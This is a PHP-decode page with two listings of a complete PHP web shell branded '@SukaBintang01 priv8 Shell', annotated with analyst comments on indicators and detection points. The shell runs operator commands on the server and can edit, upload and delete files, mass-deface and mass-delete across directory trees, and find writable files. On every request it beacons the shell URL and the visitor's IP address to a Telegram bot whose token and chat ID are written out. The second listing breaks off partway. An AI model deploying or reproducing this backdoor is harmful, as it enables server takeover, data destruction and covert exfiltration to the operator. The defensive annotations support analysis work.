PHP Decode
<?php session_start(); function sendToTelegram($message) { $botToken = "7502563828:..
Decoded Output download
<?php
session_start();
/**
 * Operator callback channel: POSTs $message to the Telegram Bot API
 * sendMessage endpoint, using the bot token and chat ID hard-coded below.
 *
 * Analyst notes: the token and chat ID are indicator/attribution material
 * for this sample. An outbound HTTPS request from the web server's PHP
 * process to api.telegram.org is a network detection point. The request is
 * made with file_get_contents() on a URL, so it depends on allow_url_fopen
 * and on the host being allowed to make outbound connections.
 *
 * @param $message Text placed in the "text" field of the request.
 * @return bool true when file_get_contents() returned a truthy response.
 */
function sendToTelegram($message) {
$botToken = "7502563828:AAE3gMvWi2-thrgX0k9mgy_EAecYXSCgAMs";
$chatID = "2024533279";
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatID,
'text' => $message
];
// NOTE(review): the header value ends in a literal line break in this decoded listing.
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded
",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
// No @ here, so a blocked or failed request can emit a PHP warning (visible in error logs).
$result = file_get_contents($url, false, $context);
return $result ? true : false;
}
// Removes the PHP execution time limit for the request; @ hides any warning if this is not permitted.
@set_time_limit(0);
// Drops PHP's cached stat() results so the file checks below see current state.
@clearstatcache();
///////////////
$folder = "data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=";
$file = "data:image/png;base64,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";
////////////////
/**
 * OS command execution helper: runs $s through the first available of
 * exec() or passthru() and returns the captured output as a string.
 *
 * Analyst notes: this is the sample's command-execution primitive. The
 * function_exists() probes fail for functions listed in disable_functions,
 * so a hardened php.ini pushes every call to the final "Unable to execute"
 * branch. Child processes spawned by the web server user are the host-side
 * detection point.
 *
 * @param $s Command line, passed unmodified to the shell.
 * @return string Command output (exec lines joined with "<br>"), or an error marker.
 */
function uni_exec($s){
if(function_exists("exec")){
$buff = "";
@exec($s, $r);
// The loop variable reuses the name of the output array $r.
foreach($r as $r){
$buff .= $r."<br>";
}
return $buff;
}
else if(function_exists("passthru")){
// passthru() writes straight to output, so it is captured with output buffering.
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
// This branch tests for system() but, as written, also calls passthru().
else if(function_exists("system")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else return "<red>Unable to execute command</red>";
}
/**
 * Recursive glob: returns the matches of pattern $s, plus the matches of the
 * same basename pattern under every entry of dirname($s), descending until
 * glob() finds nothing further.
 *
 * Analyst notes: this is the tree walker behind the mass_deface, mass_delete
 * and writable actions, so one request can touch every directory below the
 * chosen path.
 *
 * @param $s     Glob pattern (directory part plus basename pattern).
 * @param $flags glob() flags, applied to both the match and the descent.
 * @return array Merged list of matching paths.
 */
function uni_subdir($s, $flags = 0){
$f = glob($s, $flags);
foreach(glob(dirname($s)."/*", $flags) as $g){
// Re-apply the same basename pattern one level down.
$f = array_merge($f, uni_subdir($g."/".basename($s), $flags));
}
return $f;
}
/**
 * Formats a byte count for display: divides by 1024 until the value is below
 * 1024 and appends the matching unit label. Values under 1024 get no suffix.
 *
 * @param $s Size in bytes.
 * @return string Value with two decimals followed by the unit label.
 */
function uni_size($s)
{
$type = array("", "KB", "MB", "GB", "TB", "PB", );
$index = 0;
// $index is not bounded by the length of $type.
while( $s >= 1024 ){
$s /= 1024;
$index++;
}
return sprintf("%1.2f",$s).$type[$index];
}
/**
 * Reports what the PHP process itself can do with path $s, as three HTML
 * fragments (write, read, execute) coloured with the page's custom
 * green/red tags.
 *
 * Analyst notes: the checks reflect the effective rights of the web server
 * account, so the rendered table shows an intruder where that account can write.
 *
 * @param $s Filesystem path.
 * @return array Three strings, in the order Write, Read, Exec.
 */
function uni_perm($s)
{
return array(
is_writable($s) ? "<green>Write</green>":"<red>Write</red>",
is_readable($s) ? "<green>Read</green>":"<red>Read</red>",
is_executable($s) ? "<green>Exec</green>":"<red>Exec</red>"
);
}
?>
<title>
@SukaBintang01 priv8 Shell
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php
// Access gate: one shared password, hard-coded in clear text. Together with the
// title string above it is a stable content signature for file-system hunting.
$password = "SukaBintang01";
// Loose (==) comparison against the POST field; on a match, and only when no
// session id is set yet, the password itself is stored in $_SESSION["id"].
// Every later check tests only isset($_SESSION["id"]).
if(isset($_POST["password"]) && $_POST["password"] == $password && empty($_SESSION["id"])){
$_SESSION["id"] = $password;
}
?>
<link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">
<style>
* {
font-family: "Raleway";
color: white;
}
red {
color: red;
}
green {
color: green;
}
table, th, tr {
border: 1px solid #91FF00;
border-collapse: collapse;
font-size: 90%;
padding: 7px;
text-align: left;
overflow: auto;
}
a {
text-decoration: none;
}
#small-dotted {
border: 1px dotted green;
padding: 5px;
margin: 5px;
width: 40%;
background: #38B344;
text-align: center;
display: inline-block;
}
#banner {
border: 1px dotted yellow;
padding: 10px;
margin: 10px;
}
textarea {
resize: none;
border: none;
border-radius: 10px;
color: black;
width: 90%;
height: 50%;
}
#small-solid {
border: 1px solid cyan;
padding: 10px;
margin: 10px;
}
#input {
border: none;
background: white;
padding: 10px;
margin: 10px;
display: inline-block;
border-radius: 10px;
color: black;
}
#button {
border: none;
background: #0AC120;
padding: 10px;
margin: 5px;8
display: inline-block;
}
#panel {
border: none;
background: black;
padding: 10px;
margin: 5px;
width: 45%;
display: inline-block;
}
</style>
<link rel="icon" href="https://i.imgrpost.com/imgr/2019/07/10/download.png">
<body bgcolor="black">
<div id="banner">
<center>
<b>sukabintang01 priv8 shell</b><br>
<a href="?">[ HOME ]</a> <a href="?do=logout">[ LOGOUT ]</a>
<a href="?dir=<?php echo isset($_GET['dir']) ? dirname($_GET['dir']) : (isset($_GET['src']) ? dirname($_GET['src']) : getcwd()); ?>">[ BACK ]</a>
</center>
</div>
<?php
// Beacon: runs on every request, before any session check. It reports the
// shell's own URL plus the requester's IP address and User-Agent to the
// Telegram chat configured in sendToTelegram().
// Analyst notes: requesting this file on a live host, even without the
// password, notifies the operator and discloses the requester's address.
// Triage from a file copy or an isolated environment instead. The Host header
// and request URI are client-supplied, so the reported URL is whatever the
// client sent.
$fileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$ipAddress = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message = "File URL: $fileUrl
IP Address: $ipAddress
User-Agent: $userAgent";
sendToTelegram($message);
////////////////
// Action dispatcher, reachable only when a session id is set. The action name
// arrives in the "do" query parameter and the target path in "src" or "dir".
// Analyst notes: do/src/dir travel in the query string, so they normally
// appear in web access logs and give a per-request record of what was touched.
// The POST fields (content, name, text) usually do not. Request parameters
// are echoed into the HTML without escaping throughout.
if(isset($_GET["do"]) && isset($_SESSION["id"])){
switch($_GET["do"]){
// edit: with POST "content", overwrites the file at "src" (the write path is
// used as given, not via realpath). Otherwise shows the file in a form.
case "edit":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @file_put_contents($_GET["src"], stripslashes($_POST["content"]));
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
$p = @file_get_contents(realpath($_GET["src"]));
if($p) echo "
<center>
<form method='POST' action='?do=edit&src=".$_GET["src"]."'>
<green>File: ".realpath($_GET["src"])." </green>
<textarea name='content'>".htmlspecialchars($p)."</textarea>
<button id='button' style='width: 50%;'>Save</button>
</center>
";
else echo "
<center>
<red>Cant open file..</red>
</center>
";
die();
break;
///
// rename: moves "src" to the path given in POST "content".
case "rename":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @rename(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=rename&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".realpath($_GET["src"])."' value='".realpath($_GET["src"])."'>
<button id='button'>Rename</button>
</form>
</center>
";
die();
break;
////
// newfile: creates "newfile.php" (one space of content) under "src".
// The fixed name is a file-system artefact to hunt for.
case "newfile":
if(@file_put_contents(realpath($_GET["src"])."/newfile.php", " ")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
// mkdir: creates a directory with the fixed name "newfolder" under "src".
case "mkdir":
if(mkdir(realpath($_GET["src"])."/newfolder")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
// unlink: deletes the file at "src".
case "unlink":
if(@unlink(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
// rmdir: removes the directory at "src".
case "rmdir":
if(@rmdir(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
// chmod: applies the POST "content" value, passed as-is, as the mode of "src".
case "chmod":
if(isset($_GET["src"]) and isset($_POST["content"])){
$p = @chmod(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=chmod&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".fileperms(realpath($_GET["src"]))."' value='".fileperms(realpath($_GET["src"]))."'>
<button id='button'>Chmod</button>
</form>
</center>
";
die();
break;
/////
// logout: clears the session id and destroys the session.
case "logout":
unset($_SESSION["id"]);
session_destroy();
break;
// copy: duplicates "src" next to itself, with an mt_rand() number appended to the name.
case "copy":
if(copy(realpath($_GET["src"]), realpath($_GET["src"]).mt_rand())) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
// upload: stores the uploaded "qqfile" in "dir" under the client-supplied
// name, then reports the presumed public URL of the new file to Telegram.
// Analyst notes: each successful upload produces one more outbound callback.
case "upload":
$targetFile = realpath($_GET["dir"])."/".$_FILES["qqfile"]["name"];
if (move_uploaded_file($_FILES["qqfile"]["tmp_name"], $targetFile)) {
echo "<green>Success</green>";
$uploadedFileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") .
"://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . "/" . $_FILES["qqfile"]["name"];
sendToTelegram("File uploaded successfully: $uploadedFileUrl");
} else {
echo "<red>Failed</red>";
}
echo "<br>";
break;
////
// properties: prints the named stat() fields of "src", with the three
// timestamps formatted by date() and the size formatted by uni_size().
case "properties":
if(@stat(realpath($_GET["src"]))) {
echo "<green>Success</green><hr>";
foreach( array_slice(stat(realpath($_GET["src"])), 13) as $name=>$stat){
$stat = ($name == "atime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "mtime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "ctime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "size") ? uni_size($stat) : $stat;
echo $name.": <green>".$stat."</green><hr>";
}
}
else echo "<red>Failed</red>";
echo "<br>";
die();
break;
////////////
// mass_deface: writes POST "text" to a file named POST "name" in every
// directory that uni_subdir() finds below "src".
// Analyst notes: the footprint is many same-named files with near-identical
// modification times and identical content across sibling directories.
case "mass_deface":
if(isset($_POST["text"]) && isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$text = $_POST["text"];
$name = $_POST["name"];
$dd = uni_subdir("$pt/*", GLOB_ONLYDIR|GLOB_NOSORT);
foreach($dd as $ddr){
if(@file_put_contents($ddr."/".$name, $text))
echo "<green>$ddr/$name</green><br>";
else
echo "<red>$ddr/$name</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_deface&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<textarea placeholder='text' name='text'></textarea><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
///
// mass_delete: deletes every path below "src" that matches POST "name".
case "mass_delete":
if(isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name", GLOB_NOSORT);
foreach($dd as $ddr){
// $text is not assigned in this branch.
if(@unlink($ddr,$text))
echo "<green>$ddr</green><br>";
else
echo "<red>$ddr</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_delete&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
//////
// writable: lists every path below "src" matching POST "name" that the PHP
// process can write to. The placeholder says Regex, but the value is used as
// a glob pattern by uni_subdir().
case "writable":
if(isset($_GET["src"]) && isset($_POST["name"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name");
foreach($dd as $ddr){
if(is_writable($ddr))
echo "<green>$ddr</green><br>";
}
}
echo "
<form method='POST' action='?do=writable&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='*.php' placeholder='Regex'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
}
}
//////////////
?>
<?php
if(!isset($_SESSION["id"])):
?>
<form method="POST" action="">
<input name="password" id="input" placeholder="password" style="width: 60%;">
<button id="button" style="width: 30%">Login</button>
</form>
<?php
die();
else:
$dir = isset($_GET["dir"]) ? $_GET["dir"] : getcwd();
?>
System:
<div id="small-solid">
<font style="color: #0CEB9A;"><?php echo php_uname(); ?></font>
</div>
Others:
<div id="small-solid">
My IP: <font style="color: #0CEB9A;"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font><br>
Server IP: <font style="color: #0CEB9A;"><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></font><br>
Free: <font style="color: #0CEB9A;"><?php echo uni_size(disk_free_space(".")); ?></font><br>
User: <font style="color: #0CEB9A;"><?php echo get_current_user(); ?></font><br>
PYTHON: <?php echo (uni_exec("python --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
PERL: <?php echo (uni_exec("perl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
WGET: <?php echo (uni_exec("wget --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
CURL: <?php echo (uni_exec("curl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
</div>
<div id="small-solid">
<form method="POST" action="?do=upload&dir=<?php echo $dir; ?>" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" id="button" value="upload">
</form>
</div>
Toolbox:
<div id="small-solid" style="text-align: center;">
<div id="small-dotted">
<a href="?do=mass_deface&src=<?php echo $dir; ?>">Mass Deface</a>
</div>
<div id="small-dotted">
<a href="?do=mass_delete&src=<?php echo $dir?>">Mass Delete</a>
</div>
<div id="small-dotted">
<a href="?do=writable&src=<?php echo $dir?>">Writable</a>
</div>
</div>
<table style="width: 100%;">
<tr>
<th>Name</th>
<th>Permission</th>
<th>Action</th>
</tr>
<?php
// Breadcrumb: splits the resolved directory on "/" and emits one link per
// path component, each pointing at the cumulative path so far.
$hb = "";
$nb = "";
$hit = "";
foreach(explode("/",realpath($dir)) as $vb){
$hb .= $vb."/";
$nb = $vb;
$hit .= "<a href='?dir=$hb'>$nb/</a>";
}
echo "Path: $hit";
echo "<br>
<form method='POST' action='?do=cmd&dir=$dir'>
SukaBintang01.~$<input id='input' name='cmd' placeholder='command'>
</form>
";
// Command execution entry point: the POST field "cmd" goes to uni_exec() and
// the output is echoed unescaped. The form posts with do=cmd, which has no
// matching case in the dispatcher switch; the command is handled here.
// Analyst notes: the command text is in the POST body and so is usually
// absent from access logs. The logged trace is a POST to this file with
// do=cmd in the query string, plus any child processes of the web server.
echo isset($_POST["cmd"]) ? uni_exec($_POST["cmd"]) : "";
// Stops rendering when the directory cannot be listed (message spelling as in the sample).
if(!@scandir($dir)){
die("<red>permmission denied</red>");
}
// First pass: "." and ".." rows (with New File / New Folder links) and
// sub-directories (with Rename / Delete / Chmod / Info links).
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if($item == "." OR $item == ".."){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=newfile&src=$dir/$item&dir=$dir'>New File</a>
<a href='?do=mkdir&src=$dir/$item&dir=$dir'>New Folder</a>
</th>
</tr>
";
continue;
}
if(is_dir($dir."/".$item)){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=rmdir&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
// Second pass: regular files, each linking to the edit action and to
// Rename / Delete / Chmod / Copy / Info.
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if(is_file($dir."/".$item)){
$ite = "<a href='?do=edit&src=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$file'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=unlink&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=copy&src=$dir/$item&dir=$dir'>Copy</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
?>
</table>
<?php
endif;
?>
</body>
Original Code
<?php
session_start();
/**
 * Sends $message to a Telegram chat through the Bot API sendMessage
 * endpoint. The bot token and chat ID are embedded in the function body.
 *
 * Analyst notes: treat the token and chat ID as indicators for this sample.
 * The call shows up as an outbound HTTPS request from the PHP process to
 * api.telegram.org; egress rules on the web tier determine whether it succeeds.
 *
 * @param $message Text placed in the "text" field of the request.
 * @return bool true when file_get_contents() returned a truthy response.
 */
function sendToTelegram($message) {
$botToken = "7502563828:AAE3gMvWi2-thrgX0k9mgy_EAecYXSCgAMs";
$chatID = "2024533279";
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatID,
'text' => $message
];
// Form-encoded POST built with a stream context; no cURL extension is needed.
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
return $result ? true : false;
}
@set_time_limit(0);
@clearstatcache();
///////////////
$folder = "data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=";
$file = "data:image/png;base64,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";
////////////////
/**
 * Runs the command line $s with exec() or, failing that, passthru(), and
 * returns whatever the command printed.
 *
 * Analyst notes: all command execution in this sample goes through here.
 * Listing exec, passthru and system in disable_functions makes each
 * function_exists() probe fail, leaving only the error string below.
 *
 * @param $s Command line, passed to the shell unchanged.
 * @return string Output (exec lines joined with "<br>"), or an error marker.
 */
function uni_exec($s){
if(function_exists("exec")){
$buff = "";
@exec($s, $r);
// $r is both the output array and the loop variable.
foreach($r as $r){
$buff .= $r."<br>";
}
return $buff;
}
else if(function_exists("passthru")){
// Output buffering captures what passthru() would otherwise print directly.
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
// Probes for system() but calls passthru() again, as written.
else if(function_exists("system")){
@ob_start();
@passthru($s);
$str = @ob_get_contents();
@ob_end_clean();
return $str;
}
else return "<red>Unable to execute command</red>";
}
/**
 * Recursive glob used by the bulk actions: collects the matches of $s, then
 * repeats the same basename pattern inside every entry of dirname($s).
 *
 * @param $s     Glob pattern.
 * @param $flags glob() flags used for both matching and descent.
 * @return array All matching paths found in the tree.
 */
function uni_subdir($s, $flags = 0){
$f = glob($s, $flags);
foreach(glob(dirname($s)."/*", $flags) as $g){
$f = array_merge($f, uni_subdir($g."/".basename($s), $flags));
}
return $f;
}
/**
 * Human-readable size: repeatedly divides $s by 1024 and picks the unit
 * label at the resulting index; byte-range values carry no suffix.
 *
 * @param $s Size in bytes.
 * @return string Two-decimal value followed by the unit label.
 */
function uni_size($s)
{
$type = array("", "KB", "MB", "GB", "TB", "PB", );
$index = 0;
while( $s >= 1024 ){
$s /= 1024;
$index++;
}
return sprintf("%1.2f",$s).$type[$index];
}
/**
 * Returns three HTML fragments showing whether the PHP process can write,
 * read and execute path $s (green tag for yes, red tag for no).
 *
 * @param $s Filesystem path.
 * @return array Strings in the order Write, Read, Exec.
 */
function uni_perm($s)
{
return array(
is_writable($s) ? "<green>Write</green>":"<red>Write</red>",
is_readable($s) ? "<green>Read</green>":"<red>Read</red>",
is_executable($s) ? "<green>Exec</green>":"<red>Exec</red>"
);
}
?>
<title>
@SukaBintang01 priv8 Shell
</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<?php
// Hard-coded shared password; the literal is usable as a content signature.
$password = "SukaBintang01";
// On a loosely-compared (==) match with no session id present, the password
// is stored as the session id. Later code checks only that the key is set.
if(isset($_POST["password"]) && $_POST["password"] == $password && empty($_SESSION["id"])){
$_SESSION["id"] = $password;
}
?>
<link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">
<style>
* {
font-family: "Raleway";
color: white;
}
red {
color: red;
}
green {
color: green;
}
table, th, tr {
border: 1px solid #91FF00;
border-collapse: collapse;
font-size: 90%;
padding: 7px;
text-align: left;
overflow: auto;
}
a {
text-decoration: none;
}
#small-dotted {
border: 1px dotted green;
padding: 5px;
margin: 5px;
width: 40%;
background: #38B344;
text-align: center;
display: inline-block;
}
#banner {
border: 1px dotted yellow;
padding: 10px;
margin: 10px;
}
textarea {
resize: none;
border: none;
border-radius: 10px;
color: black;
width: 90%;
height: 50%;
}
#small-solid {
border: 1px solid cyan;
padding: 10px;
margin: 10px;
}
#input {
border: none;
background: white;
padding: 10px;
margin: 10px;
display: inline-block;
border-radius: 10px;
color: black;
}
#button {
border: none;
background: #0AC120;
padding: 10px;
margin: 5px;8
display: inline-block;
}
#panel {
border: none;
background: black;
padding: 10px;
margin: 5px;
width: 45%;
display: inline-block;
}
</style>
<link rel="icon" href="https://i.imgrpost.com/imgr/2019/07/10/download.png">
<body bgcolor="black">
<div id="banner">
<center>
<b>sukabintang01 priv8 shell</b><br>
<a href="?">[ HOME ]</a> <a href="?do=logout">[ LOGOUT ]</a>
<a href="?dir=<?php echo isset($_GET['dir']) ? dirname($_GET['dir']) : (isset($_GET['src']) ? dirname($_GET['src']) : getcwd()); ?>">[ BACK ]</a>
</center>
</div>
<?php
// Unauthenticated beacon: on every request, before the session check, the
// shell's URL and the requester's IP address and User-Agent are sent to the
// operator's Telegram chat.
// Analyst notes: opening this file on a live host alerts the operator, so
// analyse from a copy. The Host header and request URI in the message are
// client-controlled values.
$fileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$ipAddress = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$message = "File URL: $fileUrl\nIP Address: $ipAddress\nUser-Agent: $userAgent";
sendToTelegram($message);
////////////////
if(isset($_GET["do"]) && isset($_SESSION["id"])){
switch($_GET["do"]){
case "edit":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @file_put_contents($_GET["src"], stripslashes($_POST["content"]));
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
$p = @file_get_contents(realpath($_GET["src"]));
if($p) echo "
<center>
<form method='POST' action='?do=edit&src=".$_GET["src"]."'>
<green>File: ".realpath($_GET["src"])." </green>
<textarea name='content'>".htmlspecialchars($p)."</textarea>
<button id='button' style='width: 50%;'>Save</button>
</center>
";
else echo "
<center>
<red>Cant open file..</red>
</center>
";
die();
break;
///
case "rename":
if(isset($_POST["content"]) && isset($_GET["src"])){
$p = @rename(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=rename&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".realpath($_GET["src"])."' value='".realpath($_GET["src"])."'>
<button id='button'>Rename</button>
</form>
</center>
";
die();
break;
////
case "newfile":
if(@file_put_contents(realpath($_GET["src"])."/newfile.php", " ")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "mkdir":
if(mkdir(realpath($_GET["src"])."/newfolder")) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "unlink":
if(@unlink(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "rmdir":
if(@rmdir(realpath($_GET["src"]))) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "chmod":
if(isset($_GET["src"]) and isset($_POST["content"])){
$p = @chmod(realpath($_GET["src"]), $_POST["content"]);
echo ($p) ? "<green>Success</green>":"<red>Failed</red>";
die("<center><a href='?'>Back</a></center>");
}
echo "
<center>
<form method='POST' action='?do=chmod&src=".$_GET["src"]."'>
<input id='input' name='content' placeholder='".fileperms(realpath($_GET["src"]))."' value='".fileperms(realpath($_GET["src"]))."'>
<button id='button'>Chmod</button>
</form>
</center>
";
die();
break;
/////
case "logout":
unset($_SESSION["id"]);
session_destroy();
break;
case "copy":
if(copy(realpath($_GET["src"]), realpath($_GET["src"]).mt_rand())) echo "<green>Success</green>";
else echo "<red>Failed</red>";
echo "<br>";
break;
////
case "upload":
$targetFile = realpath($_GET["dir"])."/".$_FILES["qqfile"]["name"];
if (move_uploaded_file($_FILES["qqfile"]["tmp_name"], $targetFile)) {
echo "<green>Success</green>";
$uploadedFileUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") .
"://" . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . "/" . $_FILES["qqfile"]["name"];
sendToTelegram("File uploaded successfully: $uploadedFileUrl");
} else {
echo "<red>Failed</red>";
}
echo "<br>";
break;
////
case "properties":
if(@stat(realpath($_GET["src"]))) {
echo "<green>Success</green><hr>";
foreach( array_slice(stat(realpath($_GET["src"])), 13) as $name=>$stat){
$stat = ($name == "atime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "mtime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "ctime") ? date("FdYH:i:s.", $stat) : $stat;
$stat = ($name == "size") ? uni_size($stat) : $stat;
echo $name.": <green>".$stat."</green><hr>";
}
}
else echo "<red>Failed</red>";
echo "<br>";
die();
break;
////////////
case "mass_deface":
if(isset($_POST["text"]) && isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$text = $_POST["text"];
$name = $_POST["name"];
$dd = uni_subdir("$pt/*", GLOB_ONLYDIR|GLOB_NOSORT);
foreach($dd as $ddr){
if(@file_put_contents($ddr."/".$name, $text))
echo "<green>$ddr/$name</green><br>";
else
echo "<red>$ddr/$name</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_deface&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<textarea placeholder='text' name='text'></textarea><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
///
case "mass_delete":
if(isset($_POST["name"]) && isset($_GET["src"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name", GLOB_NOSORT);
foreach($dd as $ddr){
if(@unlink($ddr,$text))
echo "<green>$ddr</green><br>";
else
echo "<red>$ddr</red><br>";
}
}
echo "
<form method='POST' action='?do=mass_delete&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='index.php' placeholder='name'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
//////
case "writable":
if(isset($_GET["src"]) && isset($_POST["name"])){
$pt = realpath($_GET["src"]);
$name = $_POST["name"];
$dd = uni_subdir("$pt/$name");
foreach($dd as $ddr){
if(is_writable($ddr))
echo "<green>$ddr</green><br>";
}
}
echo "
<form method='POST' action='?do=writable&src=".$_GET["src"]."'>
<center>
<input id='input' name='name' value='*.php' placeholder='Regex'><hr>
<button id='button' style='width: 50%'>Tusbol</button>
</center>
</form>
";
die();
break;
}
}
//////////////
?>
<?php
if(!isset($_SESSION["id"])):
?>
<form method="POST" action="">
<input name="password" id="input" placeholder="password" style="width: 60%;">
<button id="button" style="width: 30%">Login</button>
</form>
<?php
die();
else:
